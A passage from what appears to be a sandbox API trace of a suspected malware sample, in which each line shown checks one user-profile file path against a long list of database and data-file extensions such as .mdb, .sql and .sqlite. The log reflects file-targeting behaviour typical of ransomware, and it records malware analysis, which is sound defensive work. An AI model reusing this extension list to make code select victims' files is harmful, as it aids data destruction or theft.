(lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".adp") returned 0x0 [0147.575] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".arc") returned 0x0 [0147.575] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".ora") returned 0x0 [0147.576] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".alf") returned 0x0 [0147.576] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".ask") returned 0x0 [0147.576] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".btr") returned 0x0 [0147.576] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".bdf") returned 0x0 [0147.576] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".cat") returned 0x0 [0147.576] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".cdb") returned 0x0 [0147.576] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".ckp") returned 0x0 [0147.576] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".cma") returned 0x0 [0147.577] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".cpd") returned 0x0 [0147.577] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".dacpac") returned 0x0 [0147.577] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".dad") returned 0x0 [0147.577] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".dadiagrams") returned 0x0 [0147.577] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".daschema") returned 0x0 [0147.577] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".db") returned 0x0 [0147.577] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".db-shm") returned 0x0 [0147.577] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".db-wal") returned 0x0 [0147.577] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".db3") returned 0x0 [0147.577] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".dbc") returned 0x0 [0147.577] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".dbf") returned 0x0 [0147.577] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".dbs") returned 0x0 [0147.577] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".dbt") returned 0x0 [0147.577] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".dbv") returned 0x0 [0147.577] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".dbx") returned 0x0 [0147.577] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".dcb") returned 0x0 [0147.578] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".dct") returned 0x0 [0147.578] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".dcx") returned 0x0 [0147.578] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".ddl") returned 0x0 [0147.578] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".dlis") returned 0x0 [0147.578] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".dp1") returned 0x0 [0147.578] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".dqy") returned 0x0 [0147.578] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".dsk") returned 0x0 [0147.578] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".dsn") returned 0x0 [0147.578] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".dtsx") returned 0x0 [0147.578] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".dxl") returned 0x0 [0147.578] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".eco") returned 0x0 [0147.578] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".ecx") returned 0x0 [0147.578] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".edb") returned 0x0 [0147.578] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".epim") returned 0x0 [0147.578] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".exb") returned 0x0 [0147.579] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".fcd") returned 0x0 [0147.579] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".fdb") returned 0x0 [0147.579] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".fic") returned 0x0 [0147.579] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".fmp") returned 0x0 [0147.579] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".fmp12") returned 0x0 [0147.579] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".fmpsl") returned 0x0 [0147.579] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".fol") returned 0x0 [0147.579] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".fp3") returned 0x0 [0147.579] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".fp4") returned 0x0 [0147.579] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".fp5") returned 0x0 [0147.579] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".fp7") returned 0x0 [0147.579] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".fpt") returned 0x0 [0147.579] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".frm") returned 0x0 [0147.579] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".gdb") returned 0x0 [0147.579] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".grdb") returned 0x0 [0147.579] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".gwi") returned 0x0 [0147.580] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".hdb") returned 0x0 [0147.580] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".his") returned 0x0 [0147.580] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".ib") returned 0x0 [0147.580] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".idb") returned 0x0 [0147.580] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".ihx") returned 0x0 [0147.580] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".itdb") returned 0x0 [0147.580] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".itw") returned 0x0 [0147.580] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".jet") returned 0x0 [0147.580] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".jtx") returned 0x0 [0147.580] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".kdb") returned 0x0 [0147.580] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".kexi") returned 0x0 [0147.580] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".kexic") returned 0x0 [0147.580] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".kexis") returned 0x0 [0147.580] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".lgc") returned 0x0 [0147.580] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".lwx") returned 0x0 [0147.580] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".maf") returned 0x0 [0147.581] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".maq") returned 0x0 [0147.581] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".mar") returned 0x0 [0147.581] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".mas") returned 0x0 [0147.581] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".mav") returned 0x0 [0147.581] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".mdb") returned 0x0 [0147.581] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".mdf") returned 0x0 [0147.581] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".mpd") returned 0x0 [0147.581] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".mrg") returned 0x0 [0147.581] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".mud") returned 0x0 [0147.581] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".mwb") returned 0x0 [0147.581] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".myd") returned 0x0 [0147.581] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".ndf") returned 0x0 [0147.581] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".nnt") returned 0x0 [0147.581] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".nrmlib") returned 0x0 [0147.581] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".ns2") returned 0x0 [0147.581] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".ns3") returned 0x0 [0147.582] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".ns4") returned 0x0 [0147.582] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".nsf") returned 0x0 [0147.582] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".nv") returned 0x0 [0147.582] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".nv2") returned 0x0 [0147.582] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".nwdb") returned 0x0 [0147.582] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".nyf") returned 0x0 [0147.582] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".odb") returned 0x0 [0147.582] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".oqy") returned 0x0 [0147.582] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".orx") returned 0x0 [0147.582] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".owc") returned 0x0 [0147.582] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".p96") returned 0x0 [0147.582] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".p97") returned 0x0 [0147.582] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".pan") returned 0x0 [0147.582] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".pdb") returned 0x0 [0147.582] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".pdm") returned 0x0 [0147.582] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".pnz") returned 0x0 [0147.583] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".qry") returned 0x0 [0147.583] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".qvd") returned 0x0 [0147.583] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".rbf") returned 0x0 [0147.583] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".rctd") returned 0x0 [0147.583] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".rod") returned 0x0 [0147.583] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".rodx") returned 0x0 [0147.583] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".rpd") returned 0x0 [0147.583] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".rsd") returned 0x0 [0147.583] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".sas7bdat") returned 0x0 [0147.583] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".sbf") returned 0x0 [0147.583] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".scx") returned 0x0 [0147.583] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".sdb") returned 0x0 [0147.583] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".sdc") returned 0x0 [0147.583] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".sdf") returned 0x0 [0147.583] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".sis") returned 0x0 [0147.584] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".spq") returned 0x0 [0147.584] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".sql") returned 0x0 [0147.584] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".sqlite") returned 0x0 [0147.584] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".sqlite3") returned 0x0 [0147.584] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".sqlitedb") returned 0x0 [0147.584] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".te") returned 0x0 [0147.584] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".temx") returned 0x0 [0147.584] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".tmd") returned 0x0 [0147.584] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".tps") returned 0x0 [0147.584] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".trc") returned 0x0 [0147.584] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".trm") returned 0x0 [0147.584] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".udb") returned 0x0 [0147.584] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".udl") returned 0x0 [0147.584] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".usr") returned 0x0 [0147.584] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".v12") returned 0x0 [0147.584] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".vis") returned 0x0 [0147.585] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".vpd") returned 0x0 